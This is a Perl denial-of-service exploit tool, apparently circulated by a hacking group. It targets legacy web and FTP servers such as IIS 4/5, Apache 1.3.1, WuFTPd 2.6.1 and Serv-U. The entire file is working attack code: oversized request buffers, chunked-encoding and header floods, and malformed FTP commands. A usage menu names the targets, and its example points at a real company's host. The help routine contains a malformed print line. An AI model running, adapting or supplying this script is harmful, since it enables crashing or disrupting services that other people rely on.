#!/usr/bin/perl $param = $ARGV[0]; $host = $ARGV[1]; $port = $ARGV[2]; $user = "anonymous"; #username to login on ftp-servers $pass = "Satan1c\@DoS.exp"; #password ######################################### # Satan1c DoS eXploit v.2.0 # # v1z1t www.dhgroup.org for more stuff # ######################################### #Vulnerable servers: # ######################################### #MyWebServer v.1.0.2 and lower # #602Pro Lansuite 2000a 1.0.34 # #IIS v.4-5 # #Apache 1.3.1 and lower # #FrontPage (/_vti_bin/shtml.dll) # #OmniHTTPd v.2.09 # #4D WebServer # #Advanced WebServer Pro # #602Pro Lansuite 2000a # #Savant Web Server 3.1 # #WuFTPd 2.6.1 # #TransSoft Broker FTP Server 5.0 # #TYPSoft FTP server # #Microsoft FTP Server 4.0-5.1 # #FTP Serv-U 2.5 # #Broker FTP Server 5.9.5 # ######################################### #Author: D4rkGr3y # ######################################### use IO::Socket; if ($param eq "help") { help(); } print "\n\n"; print " [DamageHackingGroup|www.dhgroup.org]\n"; print "#Satanic DoS eXploit v.2.0 by D4rkGr3y\n\n"; if (defined $param && defined $host && defined $port && $param < 18) { if ($param eq "0") { $num = "1000"; $data = "a"; print "MyWebServer v.1.0.2 - Win9x/Me/XP/NT\n"; tw(); } if ($param eq "1") { apa(); } if ($param eq "2") { iis4(); } if ($param eq "3") { iis5(); } if ($param eq "4") { iisvsfp(); } if ($param eq "5") { $num = "4096"; $data = "a"; print "OmniHTTPd v.2.09 - Win9x/Me/XP/NT\n"; tw(); } if ($param eq "6") { $num = "5000"; $data = "a"; print "4D WebServer - Win9x/Me/XP/NT\n"; tw(); } if ($param eq "7") { $num = "100"; $data = "\n"; print "Advanced WebServer Pro - Win9x/Me/XP/NT\n"; aw(); } if ($param eq "8") { $num = "160"; $data = "%2e"; print "602Pro Lansuite 2000a - Win9x/Me/XP/NT\n"; tw(); } if ($param eq "9") { $num = "300"; $data = "a"; print "Savant Web Server 3.1\n"; tw(); } if ($param eq "10") { wuftpd(); } if ($param eq "11") { trans(); } if ($param eq "12") { typsoft(); } if ($param eq "13") { msftp(); } if ($param eq "14") { servu(); } if ($param eq "15") { broker(); } if ($param eq "16") { oracle(); } } else { print "Error in Params.\n"; die "Type: perl SDE2.pl help\n"; } sub tw { print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print "Attacking target ==> "; $buffer .= $data x $num; print $socket "GET /$buffer HTTP/1.0\r\n\r\n"; print "Complete.\n"; close($socket); return; } sub aw { print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print "Attacking target ==> "; $buffer .= $data x $num; print $socket "$buffer"; print "Complete.\n"; close($socket); return; } sub iis4 { print "IIS v.4.0 - Windows NT4\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print "Attacking target ==> "; $data = "a"; $num = "3075"; $buffer .= $data x $num; print $socket "POST /blabla.htr HTTP/1.0\n"; print $socket "Host: www.dhgroup.org\n"; print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n"; print $socket "Connection: Keep-Alive\n"; print $socket "Transfer-Encoding: chunked\n"; print $socket "$buffer\r\n\r\n"; print "Complete.\n"; close($socket); return; } sub iis5 { print "IIS v.5.0 - Windows 2000\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print "Attacking target ==> "; for($n=0;$n < 110; $n++) { print $socket "GET /index.html HTTP/1.0\n"; print $socket "Host: www.dhgroup.org\n"; print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n"; print $socket "Connection: Keep-Alive\n"; print $socket "Content-Length: 5300000\n"; print $socket "uhahahahahahahahahahahahahahaha\r\n\r\n"; } print "Complete.\n"; close($socket); return; } sub apa { #Ripped from mimeflood.pl exploit. Author: L.Facq print "Apache 1.3.1 and lower - Linux\BSD\n"; print "Connecting to '$host' ==> "; $proto = getprotobyname('tcp'); socket(Socket_Handle, PF_INET, SOCK_STREAM, $proto); $sin = sockaddr_in($port,inet_aton($host)); connect(Socket_Handle,$sin) or die "Couldn't connect.\n"; print "Connected.\n"; print "Attacking target ==> \n"; send Socket_Handle,"GET / HTTP/1.0\n",0; $val= ('z'x8000)."\n"; $n= 1; $|= 1; while (Socket_Handle) { send Socket_Handle,"Stupidheader$n: ",0; send Socket_Handle,$val,0; $n++; if (!($n % 100)) { print "$n\n"; } } print "Complete.\n"; send Socket_Handle,"\n",0; while () { print $_; } } sub oracle { print "Oracle 8.0\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect: port must be 1521\n"; print "Connected.\n"; print "Attacking target ==> "; sleep(2); print $socket "\n"; for ($i=0; $i<3; $i++) { sleep(2); print $socket "Be carefull. U r under attack."; } print "Complete.\n"; close($socket); return; } sub iisvsfp { print "IIS v.4-5 vs FrontPage - Windows NT4\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; $data = "a"; $num = "4150"; $buffer .= $data x $num; print "Attacking target ==> "; print $socket "POST /_vti_bin/shtml.dll/_vti_rpc HTTP/1.1\n"; print $socket "Host: www.dhgroup.org\n"; print $socket "MIME-Version: 1.0\n"; print $socket "User-Agent: Satan1c DoS eXploit v.1.0\n"; print $socket "Connection: Keep-Alive\n"; print $socket "Content-Length: 2000\n"; print $socket "Content-Type: application/text\n\n"; sleep(4); print $socket "\n\n"; print $socket "method=$buffer\r\n\r\n"; close($socket); sleep(2); $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM); print $socket "GET / HTTP/1.1\n"; print "Complete.\n"; close($socket); return; } sub wuftpd { print "WuFTPd 2.6.1 - Linux/BSD\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { print $socket "ls -{\n"; print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub trans { print "TransSoft Broker FTP Server 5.0 - WinNT/2k/xp\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { print $socket "cwd ....\n"; print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub typsoft { print "TYPSoft FTP server\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { print $socket "RETR ../../\n"; print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub msftp { print "Microsoft FTP Server 4.0-5.1\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { $data = "a"; $num = "240"; $buf .= $data x $num; print $socket "STAT *?$buf\n"; print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub servu { print "Serv-U FTP Server 2.5\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { $data = "x00"; $num = "1000"; $buf .= $data x $num; print $socket "RETR $buf\n"; print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub broker { print "Broker FTP Server 5.9.5\n"; print "Connecting to '$host' ==> "; $socket = IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Proto => "tcp", Type => SOCK_STREAM) or die "Couldn't connect.\n"; print "Connected.\n"; print $socket "USER $user\n"; print $socket "PASS $pass\n"; if ($socket) { for ($i=0; $i<30; $i++) { print $socket "cwd ....\n"; } print "Attacking complete.\n"; } else { print $socket "Error: can't logged in.\n"; } } sub help { print "Satan1c DoS eXploit v.2.0 by D4rkGr3y print "Usage: perl Satan1c.DoS.eXp.pl [sys_type] [host] [port]\n"; print "Where 'sys_type' - type of remote server (daemon):\n"; print "HTTP servers:\n"; print "0 - MyWebServer v.1.0.2\n"; print "1 - Apache 1.3.1 and lower\n"; print "2 - IIS 4.0\n"; print "3 - IIS 5.0\n"; print "4 - IIS4-5 vs FPage Extension (/_vti_bin/shtml.dll)\n"; print "5 - OmniHTTPd v.2.09\n"; print "6 - 4D WebServer\n"; print "7 - Advanced WebServer Pro\n"; print "8 - 602Pro Lansuite 2000a\n"; print "9 - Savant Web Server 3.1\n"; print "FTP servers:\n"; print "10 - WuFTPd 2.6.1\n"; print "11 - TransSoft Broker FTP Server 5.0\n"; print "12 - TYPSoft FTP server\n"; print "13 - Microsoft FTP Server 4.0-5.1\n"; print "14 - FTP Serv-U 2.5\n"; print "15 - Broker FTP Server 5.9.5\n"; print "Example: perl SDE2.pl 3 www.microsoft.com 80 \n"; exit; }